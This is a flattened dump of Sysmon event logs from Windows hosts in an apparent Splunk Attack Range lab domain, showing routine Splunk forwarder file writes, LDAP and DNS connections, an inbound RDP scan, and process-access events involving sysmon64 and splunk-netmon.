23542300x8000000000000000808253Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:14.549{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=755BD01282E8D7C093285CAB1A3D3B87,SHA256=BDEAB57E5519D545920F05DB5AFE72C7037A9ADF48228455338B60F7EA7BDF29,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050390Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:07.976{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51083-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001050389Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:07.976{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51083-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001050388Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:15.468{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F230AC7A0C7D85A1C68424C87701E3D,SHA256=BA22483E5AAE681EC44502210FDDB47151EFAE254D6ACBC7F055368F19186E70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808254Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:15.549{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2F7C89D69C2367333F470F208050A57,SHA256=4299508E08DBF362B2399FA28082271DC338FC51EAFEEC2A840BD044BBEFE029,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050387Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:15.452{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=28E9E563EBA8F8475106C9F77C6C7FCA,SHA256=7119FB2AF74BAB80F13DE5221C9E619B3DDE2B04AAC284D307CEEE1864D13820,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808255Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:16.565{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A137DA94FF13EC2B9D51973E25F9AC4,SHA256=6B37A85F777293722F85EE285303AC4CCB636E0FB0C69CCAE5CB70ADCAB42611,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050392Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:08.047{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse184.105.247.196scan-15.shadowserver.org59144-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001050391Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:16.478{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=644E92FC3BE545CBC724BF022480FF51,SHA256=44822F9F061AC69C109A2C50A226782E0CC81F2CF470217A4966811080AF92A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050393Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:17.498{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DC522A9E2A22E5CFBF6B0E45D4964E6,SHA256=22D2A12617CA74D4B6B0AC12134053461441B4DCFCADE6D9AF7323C8077C53C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808256Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:17.565{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69B6D97CFE77D6FA618F281250DFE6EE,SHA256=F03FBA85603A02D67F1523FA77E388D4759092DFF0615C20B915C9E6789F279C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050395Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:18.514{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=171A2E4CF71BF6465695511C181CEACC,SHA256=9E1CA40555D4FDDDE886B746FA17CB4D43D154EA2486121D8158B7DD82302A29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808257Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:18.565{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F311A0D1ABB301F4E15812B4B794E670,SHA256=903A2DF0AAEAF131AA00A3FD3A150931C30F10F1DE70377269D0B9480C48B4A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050394Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:18.345{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808259Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:18.338{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57317-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808258Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:19.581{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1D3C2B8A9FE371BFEA4E9B0F6F59BCC,SHA256=0AC6AA3FC041DDE2C9F7347DF0145238F156A2308A60DABAEF8B9D9713688048,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050399Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:19.528{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45E58A1451E2121FDBB299BE068E53DB,SHA256=C56085810A7A983B2C8E0258E4A9F37C4732C71E54E88D7E23F49BDDA37400B5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050398Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:10.317{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-890.attackrange.local49689-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x80000000000000001050397Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:10.317{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local56162- 354300x80000000000000001050396Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:10.316{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local56162-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domain 23542300x8000000000000000808261Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:20.596{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808260Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:20.596{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7704BD53D74B585E56C81DB9FD98C7CA,SHA256=D0D4AC64CB97EA71D46788E2F9406C403A74A0EFAC2A0413B3C6B6EDE2A8E0CE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050401Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.730{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51084-false10.0.1.12-8000- 23542300x80000000000000001050400Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:20.529{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85AB8E7CCBB5F5FE4484555F2262E0EC,SHA256=12DEC23E937D63AEF339763C11596EDB5F8D8B052B9097DEEA1D8A3C9B189536,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808262Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:21.596{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29C678B9CBBA4AA79EA758FC851A1F0E,SHA256=E0E23DEBF521F93C45A549DEB4F7B6B3F39327F45C71F7794D977ED57FF0F73C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050402Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:21.530{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEAABC71DC2A90E3C96B2D98AEF34F0A,SHA256=9A44F75664508A2F17ED2CBA8F9ED7C1569839379D2063D63D34D317011298DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808264Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:22.596{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A4702DE17739D1A1AE429AF003CFDDA,SHA256=80BD61CED8F117CAE247406EE57EF6EAF9089692D1A9C07284E4A407C2380224,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050404Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:22.560{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=304C8707B8C8010A6FF36E409584A4C6,SHA256=BD4DD9CE3DEBDB4FA69E80DFF9C0E1D5678448C550E62C8AE91B37F40DA87566,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808263Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:20.729{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57318-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 13241300x80000000000000001050403Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:56:22.376{466BC892-02AF-60E8-1000-00000000CF01}432C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d776f3-0x67f214da) 
23542300x8000000000000000808265Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:23.612{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F879127EFF6C18D792A6AE6D6AA98F26,SHA256=C4F64DC85673D12D0E3EACFFE4A8FF49360701D6A200D13C9A9A01AFB920843F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050405Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:23.595{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=817A5D095A6D4B4C4C3AD85871488B55,SHA256=68EA845DB986F280FCD8ACAB39C6CA5ED2E48D674A2259314B551D244C0D4000,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050406Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:24.613{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66C0E248C2125EEEEFDB2B43948ABC84,SHA256=7D62B0C1986402C187D2D8FDC1D120C172431F05C62FB617AA639D8F828DBBEB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808293Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.862{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F5A8-60EB-9079-00000000D001}2316C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808292Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.862{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808291Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:24.862{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808290Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.862{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808289Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:24.862{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808288Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.862{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808287Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:24.862{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808286Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.862{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808285Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:24.862{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808284Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.862{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808283Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.862{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F5A8-60EB-9079-00000000D001}2316C:\Program 
